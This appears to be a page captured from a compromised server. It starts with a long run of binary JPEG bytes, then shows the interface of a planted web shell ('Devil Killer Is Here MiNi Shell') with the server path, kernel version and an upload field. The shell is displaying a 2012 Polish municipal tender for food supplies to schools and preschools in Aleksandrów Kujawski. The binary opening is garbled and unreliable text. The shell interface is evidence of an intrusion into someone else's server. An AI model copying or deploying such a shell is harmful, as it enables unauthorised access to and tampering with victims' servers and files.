JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121105/432216-N-2012.html

<p class="kh_header"><b>Aleksandrów Kujawski: Zakup wraz z dostawą żywności na potrzeby 
Zespołu Obsługi Szkół i Przedszkoli Samorządowych 
w Aleksandrowie Kujawskim</b><br>
<b>Numer ogłoszenia: 432216 - 2012; data zamieszczenia: 05.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Aleksandrowa Kujawskiego , ul. Słowackiego 8, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 054 2824855, faks 054 2822101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aleksandrowkujawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą żywności na potrzeby 
Zespołu Obsługi Szkół i Przedszkoli Samorządowych 
w Aleksandrowie Kujawskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup wraz z dostawą żywności na potrzeby Zespołu Obsługi Szkół i Przedszkoli Samorządowych w Aleksandrowie Kujawskim. 

Zamawiający dopuszcza składanie ofert częściowych.

Dostawa oznaczona jako Część I świeże warzywa i owoce będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03221000-6, 03222300-6

1. Arbuz 53 kg
2. Banany 393 kg
3. Buraki 1141 kg
4. Botwina 60 szt
5. Brzoskwinie 22 kg
6.Cebula 1113 kg
7.Cukinia 13 kg
8.Cytryny 28 kg
9.Fasola Jaś gruba 102 kg
10.Fasolka szparagowa żółta 34 kg
11.Jabłka 1301 kg
12. Kapusta kiszona 1177 kg
13.Kapusta czerwona 408 szt
14. Kapusta biała 868 szt
15.Kapusta młoda 80 szt
16.Kalafior 189 szt
17. Koper świeży 556 szt
18. Kapusta włoska 53 szt
19.Kapusta pekińska 243 kg
20.Kiwi 521 szt
21.Marchew 2161 kg
22.Mandarynki 134 kg
23.Nektarynki 45 kg
24.Ogórek kiszony 456 kg
25. Ogórek świeży 362 kg
26.Papryka czerwona 34 kg
27. Por 1344 szt
28.Pomarańcze 390 kg
29. Pieczarki 259 kg
30.Pomidory kl. I 56 kg
31. Pietruszka zielona 912 szt
32.Rzodkiewka 29 szt
33. Seler korzeń 844 kg
34. Szczypior 23 szt
35.Sałata zielona 394 szt
36.Śliwy 18 kg
37.Truskawki 102 kg
38.Winogrona 55 kg
39.Ziemniaki 24200 kg



Dostawa oznaczona jako Część II wyroby piekarskie będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15811000-6

1.Chleb krojony (0,50 kg) 1706 szt.
2.Bułka kajzerka 3340 szt.
3.Chleb graham krojony 191 szt.
4. Bułka tarta 498 kg
5. Drożdżówki 165 szt. 
6. Pączek mały 26 kg
7.Babka piaskowa 107 kg
8. Murzynek 33 szt.
9. Bułka graham 1395szt. 
10. Chałka 0,45 kg 100 szt.

Dostawa oznaczona jako Część III mrożone artykuły spożywcze będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15331170-9

1. Brokuł (opak. 450 g) 58 opak.
2.Bruksela (opak. 450 g) 40 opak.
3. Fasolka szparagowa żółta (opak. 450 g) 16 opak.
4. Kalafior (opak. 450 g)  8 opak.
5. Mieszanka warzywna 3-składnikowa (opak. 450 g) 319 opak.
6. Pyzy 24 kg


Dostawa oznaczona jako Część IV jaja kurze świeże o gramaturze 50 g będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03142500-3 
1. Jaja kurze 50 g 11612szt.

Dostawa oznaczona jako Część V artykuły spożywcze sypkie, koncentraty, przyprawy   i desery :
Kod Wspólnego Słownika Zamówień (CPV): 15800000-6
 
1. Budyń (różne smaki) 64 g 388 szt. 
2. Ciastka kruche 114 kg
3. Cukier kryształ 1 kg 1036 kg
4.Chrzan tarty 180 g 69 szt. 
5. Cukier waniliowy 20g 130 szt.
6. Cukierki 10,5 kg
7.Czekolada 235 szt.
8. Cynamon 20 g 6 szt. 
9.Dżem wysokosłodzony 3kg
10. Dżem niskosłodzony 280 g 286 szt.
11.Galaretki owocowe 75 g 758 szt. 
12. Groszek konserwowy 400 g 50 szt.
13. Groch 400 g 72 szt.
14. Herbata ekspresowa Saga 400g 240 70 szt. 
15. Herbata miętowa 20 g 32 szt.
16 Herbata wieloowocowa 40 g szt.
17.Kukurydza 400 g 116 szt. 
18.Kasza manna 400 g 126 szt.
19.Kasza jęczmienna 1 kg 360 kg
20. Kwasek cytrynowy 20 g 386 szt. 
21.Koncentrat pomidorowy 850 g 30% 177 szt.
22. Koncentrat pomidorowy 210 g 30% szt. 263
23 Kisiel bezcukrowy 58 g 320 szt.
24. Kakao 100% 300 g 110 szt. 
25. Kawa Inka 150 g 63 szt.
26. Kasza gryczana 1 kg 154 kg
27. Ketchup łagodny 380 g 96 szt.
28.Liść laurowy 12 g 94 szt.
29 Mąka pszenna 1 kg 1168 kg
30. Majeranek 20 g 264 szt.
31. Musztarda 200g 52 szt.
32.Mąka ziemniaczana 1 kg 60 kg
33. Makaron 400 g (różne kształty) 1311 kg
34. Majonez 260 g 454 szt.
35. Ogórek konserwowy 0,9l 142 szt. 
36.Olej uniwerslany 0,9l 928 szt.
37.Ocet 0,5 l 10% 80 szt.
38.Przyprawa w płynie do zup, sosów i sałatek 301 szt.
39.Pasztet drobiowy 131 g 200 szt.
40. Papryka mielona słodka 20 g 107 szt.
41. Pieprz naturalny ziarno luz 20 g 142 szt.
42. Pieprz naturalny mielony 20 g 325 szt.
43. Powidła śliwkowe 290g 105 szt.
44. Powidła śliwkowe 320 g 60 szt. 
45.Przyprawa do kurczaka 20 g 187 szt.
46.Przyprawa do mięsa wieprzowego 20g 121 szt.
47.Przyprawa warzywna do zup i sosów   ziarenko smaku 200 g 1214 szt.
48. Ryż 1 kg 301 kg
49.Rodzynki 100 g 12 szt.
50. Soki owocowe Garden (różne smaki) 2l 78 szt.
51.Soki owocowe (różne smaki) 420 ml 184 szt.
52. Sól jodowana 1 kg 74 kg
53. Syrop owocowy Owocowa spiżarnia(różne smaki) 420 ml 208 szt.
54. Śliwy suszone 250 g 8 szt.
55.Ziele angielskie 20 g 113 szt. 
56.Wafle nieoblewane 1 karton 35 szt 1470 szt.
57.Wafle typu prince polo 1 karton 56 szt 1131szt.
58.Zupa pieczarkowa 50 g 178 szt. 
59. Żurek 50 g 267 szt.
60.Brzoskwinie puszka 12 szt. 
61.Czosnek przyprawa sypka 32 szt. 
62.Płatki śniadaniowe 434 szt.
63. Powidła 290 g 96 szt. 
64.Śnieżka 60 g 75 szt.
65.Kawa Anatol 99 szt.
66.Mleko w proszku 500 g 60 szt.
67.Sos do spaghetti 250 g 125 szt.
68. Ananas 580 ml 172 szt. 
69. Baton śniadaniowy75 g 236 szt.
70. Bazylia 10 szt. 
71.Zupa barszcz biały w proszku 15 g 256 szt.
72.Zupa brokułowaw proszku 15 g 256 szt.
73.Brzoskwinie  850 ml 92 szt.
74.Zupa cebulowa w proszku 15 g 20 szt.
75.Czosnek 50 g 194 szt.
76. Fasola czerwona puszka 280 g 29 szt
77.Koncentrat buraczany butelka 270 ml 22 szt.
78.Żurek w proszku 15 g 177 szt.
79.Żurawina 15 g 4 szt.
80.Zajączki czekoladowe 2 kg
81.Szczaw 290 g 71 szt.
82.Zacierka 250 g 251 szt.
83.Kostki rosołowe paczka 75 g 18 84 szt.Przyprawa do kebab 15 g 8 szt.
85. Przyprawa do sałatek 15 g 6 szt.
86. Przyprawa do mięsa mielonego 15 g 10 szt. 
87. Łazanki 400 g 40 szt.
88.Makaron 250 g 1210 szt.
89. Sok Kubuś 900 ml 105 szt.
90.Krem Nutella 230 g 105 szt.


Dostawa oznaczona jako Część VI  mięso świeże, wędliny i drób:
Kod Wspólnego Słownika Zamówień (CPV): 15100000-9

MIĘSO ŚWIEŻE

1. Szynka wieprzowa b/k 254 kg
2. Gulasz wieprzowy 450 kg
3. Schab wieprzowy z/k 339 kg
4.Schab wieprzowy b/k 66 kg
5.Karczek wieprzowy b/k 65 kg
6.Smalec 70 kg
7.Słonina 20 kg
8. Boczek wędzony 55 kg
9.Łopatka b/k 612 kg
10. Karkówka 218 kg

WĘDLINY ŚWIEŻE

1. Kiełbasa zwyczajna 332 kg
2. Parówki drobiowe 85 kg
3. Kiełbasa podwawelska 44,5 kg
4. Kiełbasa tatrzańska 10 kg
5. Kiełbasa mazurska 12 kg
6. Kiełbasa górska 12 kg
7.Kiełbasa szynkowa wieprzowa 5 kg
8. Szynka wieprzowa 15 kg
9.Szynka wieprzowa konserwowa 13 kg
10.Mielonka  5 kg
11.Polędwica z warzywami 10 kg

MIĘSO DROBIOWE ŚWIEŻE 

1.Filet z indyka surowy 49 kg
2. Filet z kurczaka surowy 1100 kg
3.Udka z kurczaka 871 kg
4. Wątróbka drobiowa 454 kg
5.Żołądki drobiowe 45 kg
6. Porcje rosołowe 675 kg
7. Skrzydełka 254 kg

Dostawa oznaczona jako Część VII  mleko i produkty mleczarskie:
Kod Wspólnego Słownika Zamówień (CPV):  15500000-3

1.Mleko 3,2% 1 l karton 828 l
2. Mleko 2% 1 l karton 2426 l
3. Jogurt naturalny opak. 150 g 200 szt.
4. Jogurt owocowy 150 g 3305 szt.
5. Masło extra 82% tł. 200 g 1215 szt.
6. Ser żółty zamojski/edamski 32 kg
7. Serki topione krem. Opak. 100 g 100 szt.
8. Ser biały półtłusty 787 kg
9. Serek homogenizowany owocowy Bakuś 90 g 199 szt.
10. Serek kanapkowy 80 g 125 szt.
11. Śmietana 18% opak. 400/500 ml 723 szt.
12. Śmietana 12% opak. 400/500 ml 243 szt.
13. Śmietana 36% opak. 400/500 ml 76 szt.
14. Serki Danonki 566 szt. 
15. Deser Satino 175 g 1925 szt. 
16. Ser żółty krojony paczkowany 150 g 77 szt. 


Dostawa oznaczona jako Część VIII  ryby:
Kod Wspólnego Słownika Zamówień (CPV):  03311000-2 Ryby
1. Filet rybny z morszczuka (mrożony) 293 kg
2. Filet rybny z mintaja (mrożony) 115 kg
3. Ryba panga (mrożona) 85 kg
4. Ryba sola (mrożona) 75 kg
5. Makrela wędzona 30

Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do:
Publicznej Szkoły Podstawowej Nr 3 im. Józefa Wybickiego, ul Szkolna 6, Aleksandrów Kujawski
Publicznej Szkoły Podstawowej Nr 1 i. Polskich Podróżników, ul. Gen. Wł. Sikorskiego 5, Aleksandrów Kujawski
Przedszkola Samorządowego im. Juliana Tuwima, ul. Wojska Polskiego 19, Aleksandrów Kujawski.

Każdy z produktów powinien być dostarczony w wymaganych opakowaniach.
Cykliczne dostawy  będą realizowane jak następuje: 
Część I świeże warzywa i owoce - w drugim dniu od złożenia zamówienia od poniedziałku do piątku w godzinach od  7.00 do 9:00.
Część II  wyroby piekarskie - codziennie w drugim dniu od złożenia zamówienia od
poniedziałku do  piątku w godz. od 7.00 do 9:00. Dostawy do Przedszkola Samorządowego realizowane będą w godzinach od 6.00 do 7.00.
Część III  mrożone artykuły spożywcze - w  drugim dniu  od złożenia zamówienia 
od poniedziałku do piątku w godz. 7.00 do 9:00.
Część IV jaja kurze świeże - w drugim dniu  od złożenia zamówienia od poniedziałku 
do piątku w godz. 7.00 do 9:00.
Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery - w drugim dniu od złożenia zamówienia od poniedziałku do piątku w godz. 7.00 do 9:00.
Część VI  mięso świeże, wędliny i drób - codziennie w drugim dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 7.00 do 9:00. Dostawy do Przedszkola Samorządowego realizowane będą w godzinach od 6.00 do 7.00.
Część VII  mleko i produkty mleczarskie - codziennie  w drugim dniu od złożenia    
	zamówienia od poniedziałku do piątku w godzinach 7.00 do 9:00.  Dostawy do 	Przedszkola Samorządowego realizowane będą w godzinach od 6.00 do 7.00
Część VIII ryby - codziennie w drugim dniu od złożenia zamówienia od poniedziałku do piątku w  godzinach od  7.00 do 9:00
Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane produkty z podaniem ilości.
Produkty muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
W przypadkach, w których Zamawiający użył nazw własnych dla określenia walorów smakowych produktów, Zamawiający dopuszcza produkty o walorach smakowych takich samych lub wyższych.
Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa towaru wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie towaru do siedziby Zamawiającego na okres do następnej dostawy. Podane ilości towaru  są szacunkowe i mogą ulec zmianie.  Dotyczy to zmniejszenia lub zwiększenia ilości zamawianego towaru 
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia  lub zwiększenia  zamówienia.
Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 Pzp.
Dopuszcza się możliwość zamiany ilości poszczególnego asortymentu. 
Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanego towaru i dostarczenia nowej partii do siedziby  Zamawiającego  w dniu złożenia reklamacji.
Do składania zamówień Zamawiający upoważni wybranego pracownika..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające polegające na powtórzeniu asortymentu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3, 03.31.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie warunku, posiadania uprawnień do wykonywania określonej działalności       lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z wzorem nr 2 - ocena spełnienia tego warunku będzie dokonana na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie warunku posiadania wiedzy i doświadczenia
wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, co najmniej jedną dostawę artykułów żywnościowych,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie warunku dysponowania odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania zmówienia 
Oświadczenie, że Wykonawca posiada pojazd przystosowany do przewozu przedmiotowego zamówienia, oraz że dysponuje osobami zdolnymi do rozładunku przedmiotu zamówienia . Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z wzorem nr 2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia dla wykazania, że Wykonawca spełnia warunek, składa oświadczenie o spełnianiu warunku zgodnie z wzorem nr 2 - ocena spełnienia tego warunku będzie dokonana na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.aleksandrowkujawski.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Aleksandrowie Kujawskim
ul. Słowackiego 8
87-700 Aleksandrów Kujawski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2012 godzina 10:00, miejsce: Urząd Miejski w Aleksandrowie Kujawskim
ul. Słowackiego 8
87-700 Aleksandrów Kujawski (pok. 102).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com